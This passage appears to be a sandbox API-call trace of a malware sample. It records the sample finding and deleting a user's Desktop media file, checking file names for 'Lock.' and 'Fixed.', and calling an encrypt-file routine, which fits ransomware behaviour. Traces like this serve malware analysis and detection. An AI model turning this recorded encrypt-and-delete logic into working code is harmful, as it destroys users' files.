lpMsg=0x8cf968) returned 0 [0187.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0187.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0187.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0187.344] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0187.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0187.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0187.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0187.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0187.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0187.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0187.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0187.346] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/kjGjReTolqh2VyQZXmn2.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kjGjReTolqh2VyQZXmn2.m4a", lpFilePart=0x8cedf4*="kjGjReTolqh2VyQZXmn2.m4a") returned 0x30 [0187.346] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kjGjReTolqh2VyQZXmn2.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\kjgjretolqh2vyqzxmn2.m4a")) returned 0x20 [0187.346] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kjGjReTolqh2VyQZXmn2.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83246c0, ftCreationTime.dwHighDateTime=0x1d5e4ad, ftLastAccessTime.dwLowDateTime=0xa46c6400, ftLastAccessTime.dwHighDateTime=0x1d5e640, ftLastWriteTime.dwLowDateTime=0xa46c6400, ftLastWriteTime.dwHighDateTime=0x1d5e640, nFileSizeHigh=0x0, nFileSizeLow=0x13925, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="kjGjReTolqh2VyQZXmn2.m4a", cAlternateFileName="KJGJRE~1.M4A")) returned 0xa87650 [0187.347] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kjGjReTolqh2VyQZXmn2.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\kjgjretolqh2vyqzxmn2.m4a")) returned 1 [0187.371] FindNextFileW (in: hFindFile=0xa87650, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83246c0, ftCreationTime.dwHighDateTime=0x1d5e4ad, ftLastAccessTime.dwLowDateTime=0xa46c6400, ftLastAccessTime.dwHighDateTime=0x1d5e640, ftLastWriteTime.dwLowDateTime=0xa46c6400, ftLastWriteTime.dwHighDateTime=0x1d5e640, nFileSizeHigh=0x0, nFileSizeLow=0x13925, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="kjGjReTolqh2VyQZXmn2.m4a", cAlternateFileName="KJGJRE~1.M4A")) returned 0 [0187.371] FindClose (in: hFindFile=0xa87650 | out: hFindFile=0xa87650) returned 1 [0187.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0187.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0187.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0187.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0187.372] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0187.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0187.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0187.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0187.372] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0187.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0187.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0187.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0187.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0187.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0187.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0187.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0187.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0187.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0187.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0187.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0187.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0187.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0187.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0187.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0187.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0187.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0187.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x62) returned 0x2e563a8 [0187.373] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/kjGjReTolqh2VyQZXmn2.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kjGjReTolqh2VyQZXmn2.m4a", lpFilePart=0x8cf650*="kjGjReTolqh2VyQZXmn2.m4a") returned 0x30 [0187.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0187.373] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kjGjReTolqh2VyQZXmn2.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\kjgjretolqh2vyqzxmn2.m4a")) returned 0xffffffff [0187.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0187.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0187.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0187.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0187.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0187.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0187.374] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0187.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0187.374] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0187.374] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0187.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0187.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0187.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0187.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0187.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0187.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0187.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0187.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0187.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0187.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0187.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0187.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0187.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0187.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kMN4z.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MN4z.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N4z.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4z.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0187.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0187.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0187.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0187.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0187.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0187.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0187.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0187.375] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0187.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0187.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0187.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0187.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0187.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0187.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0187.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0187.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0187.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0187.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kMN4z.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MN4z.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N4z.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4z.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0187.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0187.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0187.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0187.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0187.377] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0187.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0187.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0187.377] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0187.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0187.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0187.378] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0187.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0187.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0187.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0187.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0187.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0187.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0187.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0187.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0187.379] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0187.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0187.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0187.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0187.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0187.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0187.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0187.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0187.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0187.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53770 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0187.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0187.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0187.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0187.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0187.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0187.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0187.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0187.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 